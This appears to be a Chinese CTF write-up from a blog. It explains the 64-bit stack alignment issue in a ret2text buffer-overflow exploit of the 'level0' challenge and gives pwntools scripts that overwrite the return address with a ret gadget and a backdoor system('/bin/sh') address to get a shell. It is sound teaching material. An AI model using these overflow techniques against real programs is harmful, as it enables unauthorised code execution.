ret2text涉及到的堆栈平衡问题

最新推荐文章于 2023-07-24 20:58:18 发布
最新推荐文章于 2023-07-24 20:58:18 发布
阅读量4.4k 收藏 39
点赞数 20
文章标签: 堆栈 pwn ubuntu python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41560595/article/details/112161243
版权

在ubuntu18以上的版本,64位的程序若包含了system(“/bin/sh”),就需要考虑堆栈平衡。下面以一道例题说明。

链接:https://pan.baidu.com/s/1QfEWfZDiqz56w7EwDFEvzg
提取码:1111

主函数:
在这里插入图片描述
被调用函数:
在这里插入图片描述
文件提供的后门函数:
在这里插入图片描述
很简单的栈溢出。

32位能正常运行的题解,在这里是错误的:

from pwn import *

io=process("./level0")
raw_input()
elf=ELF("./level0")
system_addr=0x400596
io.recvuntil(b"World\n")

payload=b"A"*(0x88)+p64(system_addr)
io.send(payload)
io.interactive()

我们另开一个终端,调试分析:
在这里插入图片描述
跟进callsystem中的system函数,有一个指令要求rsp+0x40的值是16字节对齐。
在这里插入图片描述
$rsp+0x40没有16字节对齐。

解决方法

更改payload长度,再添加一个任意的ret指令(不是同一个函数的ret也行)。
在这里插入图片描述

正确的题解:

from pwn import *

io=process("./level0")
#raw_input()
elf=ELF("./level0")
system_addr=0x400596
io.recvuntil(b"World\n")

payload=b"A"*(0x88)+p64(0x4005A5)+p64(system_addr)
io.send(payload)
io.interactive()

栈图:
注:下图第一步“callsystem处压入的rbp”改为“vulnerable_function处压入的rbp”。笔误写错了。
第一步的leave和ret是vulnerable_function的最后两步。
在这里插入图片描述

在这里插入图片描述
16字节对齐了,堆栈也平衡了。

大功告成
在这里插入图片描述
参考:http://blog.eonew.cn/archives/958
在这里插入图片描述

写在最后
最近有在转安卓逆向方向,感兴趣的同学可以来公众号看看哦~ 欢迎一起讨论问题~~

在这里插入图片描述

「已注销」
关注
  • 20
    点赞
  • 39
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
pwn ret2shellcode
young‘s blog
02-08 1664
写在前面,记录一些小知识和一些文章 对于checksec后几个参数的具体研究: checksec及其包含的保护机制 (原博客图已经挂了,只能用简书的了) pwntools介绍(刚开始看不懂英文文档可以看这个): pwntools pwntools使用简介 文件执行时权限不够使用命令为: chmod +x start.sh 当堆栈开启了保护的时候,我们不能够直接将shellcode覆盖到堆栈中执行,...
ret2text涉及到的堆栈平衡问题-附件资源
03-02
ret2text涉及到的堆栈平衡问题-附件资源
关于pwn64位amd构造payload时的堆栈平衡问题以及32位与64位构造payload的区别与注意事项
最新发布
hu_c_t_f的博客
07-24 2272
pwn入门,栈溢出漏洞是比较合适的。但我们经常会遇到i386【下面称32位】和arm64【下面称64位】的可执行程序【题目附件】。而32位与64位同样的情况,比如同样是ret2text或ret2syscall时,写的payload是不一样的,但大体的思路是一样的。本人也是入门pwn的小白,写的不对的地方还请师傅们指出。栈堆平衡32位中,没有堆栈平衡一说,而64位中有。payload中的堆栈平衡简单来说,就是要保证payload的字节数是16的倍数。
pwn06(关于64位程序堆栈平衡的处理)
Welcome To Myon'Blog !
07-07 889
堆栈平衡: 当我们在堆栈中进行堆栈的操作的时候,一定要保证在RET这条指令之前,ESP指向的是我们压入栈中的地址,函数执行到ret执行之前,堆栈栈顶的地址 一定要是call指令的下一个地址。
入门pwn题目ret2text
03-26
入门pwn题目ret2text
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc exploit
07-07
exploit hack linux ret2libc
堆栈8字节对齐问题的讨论
wl_1314的博客
08-11 967
堆栈8字节对齐问题的讨论 from: https://www.21ic.com/app/mcu/201808/783440.htm [导读]一.为什么要保证堆栈8字节对齐AAPCS规则要求堆栈保持8字节对齐。如果不对齐,调用一般的函数也是没问题的。但是当调用需要严格遵守AAPCS规则的函数时可能会出错。例如调用sprintf输出一个浮点数时,栈必须是8字节对齐 一.为什么要保证堆栈8字节对齐 AAPCS规则要求堆栈保持8字节对齐。如果不对齐,调用一般的函数也是没问题的。但是当调用需要严格遵守AAPCS规则
函数堆栈平衡
weixin_30263073的博客
05-04 210
int func(int a,int b,int c, int d) { 01243CE0 push ebp 01243CE1 mov ebp,esp 01243CE3 sub esp,0CCh 01243CE9 push ebx 01243CEA push esi 01243...
堆栈平衡(简单main函数演示)
10-29
堆栈平衡(简单main函数演示)
实践出真知--你的字节对齐和堆栈认知可能是错误的
wwwyuewww的专栏
06-12 448
最近在查一个问题时,需要查看程序的堆栈。但在分析堆栈时,出现了一些意料之外的情况。这打破了我对字节对齐和堆栈的固有认知。就如标题所指示,实践出真知,有时候我们的固有印象可能是错误的,并可能因此为问题的解决带来额外的不必要麻烦。具体是什么情况呢,听龙赤子给您慢慢道来。对于有开发经验的C/C++码农来讲,字节对齐和堆栈相关的知识是入门必备技能。面试中,这类问题也是高频出现。可见它们是非常基础,非常重要的知识。同样,对于有开发经验的码农来讲,很大可能会觉得字节对齐和堆栈问题是小case,自己早已深入理解,掌握透彻
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6122
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
从汇编角度理解 ebp&esp 寄存器、函数调用过程、函数参数传递以及堆栈平衡
个人笔记
04-04 9561
本文试图从汇编以及整体上,讲解函数调用时,堆栈的变化,以及到底是如何进行参数的传递。如果你细读此文,相信一定会有所收获。
pwn学习day4——ret2text
qq_44657899的博客
06-29 401
覆盖函数返回地址到程序内存在的gadgets获取shell。找到hint函数地址就可以解出题目了,但是打死都不行。gdb断点至scanf函数处,也没看出来哪里出现了问题。32位这里遇到个问题,按理来说覆盖长度为。直接溢出至hint函数处即可。问大佬说是因为需要绕过ecx。
搭建Ubuntu16.04系统下Pwn环境的几个疑难问题
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-10 7630
  之前搭建了一下 Ubuntu 系统下的 Pwn 环境,但是搭建过程中遇到很多问题,有些顺手可以解决。还有一部分花费了很长时间,在此记录。 1. 使用通用exp执行不能getshell   前情提要:   我本来是有一套 Kali 的做题环境的,执行 exp 什么的都正常,后来重新搭了一套 Ubuntu20.04 的环境。工具什么的都可以正常安装,但是发现之前能用的 exp 都执行不了了,执行起来会报错并且不能getshell了。   以攻防世界Pwn题目“level0”为例,EXP如下: from pw
ubuntu 18常用优化配置 笔记
心飞路漫的博客
08-12 1695
#修改源为清华大学 \cp -f /etc/apt/sources.list /etc/apt/sources.list_bak_`date +"%Y_%m_%d_%H_%M_%S"`; echo 'deb http://archive.ubuntu.com/ubuntu/ bionic main restricted # deb-src http://archive.ubuntu.com/ubu...
pwn刷题num24----ret2libc + 栈平衡
tbsqigongzi的博客
04-26 1154
BUUCTF-PWN-ciscn_2019_c_1 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,有三个选择, 欢迎来到这台加密机 1.加密 2.解密 3.退出 选加密1写入三个aaa,被加密成lll,选解密2,出了一句我认为你能自己解密。。。 ida看一
[RE]lab1B&lab1A's writeup&脚本;使堆栈平衡的另一种方法
PepperYouth的博客
12-03 338
lab1B & lab1A
pop esi pop edi pop ebx mov esp, ebp pop ebp ret在nasm中退出堆栈的作用
04-26
2. pop edi:将栈顶元素弹出并保存到edi寄存器中,因为代码可能需要edi寄存器中的值。 3. pop ebx:将栈顶元素弹出并保存到ebx寄存器中,因为代码可能需要ebx寄存器中的值。 4. mov esp, ebp:将ebp寄存器中的值...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值